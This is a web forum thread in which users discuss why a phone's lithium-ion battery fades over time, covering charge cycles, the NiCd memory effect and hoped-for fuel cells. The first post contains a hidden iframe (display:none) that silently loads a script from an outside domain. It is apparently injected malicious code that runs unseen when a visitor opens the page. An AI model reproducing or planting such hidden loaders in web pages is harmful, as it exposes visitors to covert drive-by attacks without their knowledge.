+ Reply to Thread

Fading battery life

I've had this incredibly useful and marvelous unit since the first of the year. It's my primary business phone - and I have both Asian and European clients so it's ON 24 hours a day, and I use about 3,000 minutes a month.

Lately I've noticed a reduction in battery life. Is this to be expected?

With a fading NiCd cell you could completely drain the battery and then recharge, recovering full capacity. If that doesn't work with these lithium batteries, is there any procedure that does?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    The older I get, the better I was...

Administrator

Arrow

Li-Ion batts have a finite life span. they will go dead over time.

you should expect this to occur. the cells in the Li-Ion will degrade and wont hold a charge. your only recourse is to get another batery. but since the 330 is coming out (as well as others) id say hold out for one of them...

Li-Ion donesnt suffer from memory, just the materials int he cells just crystaliize....

Really, a finite number of charges? Any idea about how many or what consitutes a "charge cycle"? I have 4 batteries (2 slim and 2 extended) and rotate them religiously. I have had my unit since last Oct and none of the batteries are showing any signs of fatigue.
    Carl

Administrator

Arrow

id say in my experience with Li-Ion, Li-Ion batts will last up to 2 years of use before they start to fall off..

the big thing with Li-Ion is that they are very linear whereas the old Nickel metal hydride batts fell off very quickly toward 35% of juice left in the cells. thats why we dont normally see the charge time suffer in the ions...

the amount of charge 'time' does not affect the battery life of them. its the amount of charge 'cycles' you go through.

new cell technology is under way, utilizing fuel cell technology incorporating hydrigen gas or alcohol or methanol. the issues from this technology come from the fact they they are flammable liquids and that early prototypes are about the size of a deck of cards. this technology, which is to last 10 times longer than our Li-Ion counterparts, may hit the market by '04 at best.

Platinum Member

Re: Fading battery life

Originally posted by h_eisenson
    With a fading NiCd cell you could completely drain the battery and then recharge, recovering full capacity.
    Just a side note for the benefit of the comunity:
    Sounds like you have your NiCd facts confused. NiCd batteries suffer from the "memory effect". If you put a NiCd battery in the charger while it's "half full", next time you use it, it will only run until it reaches that point where you started recharging it. At that point it's impossible to "completely drain the battery and then recharge".

To avoid the memory effect, you should always completely drain the battery and then recharge.

If your battery's life is shortened by the memory effect, there are devices that claim to fix it by giving your battery bursts of power higher than the normal recharge level. I don't know of the effectiveness of that method.

Marc:
    Thanks for the insight on the new battery technology on the horizon. Ten times longer life could revolutionize mobile computing.
    Carl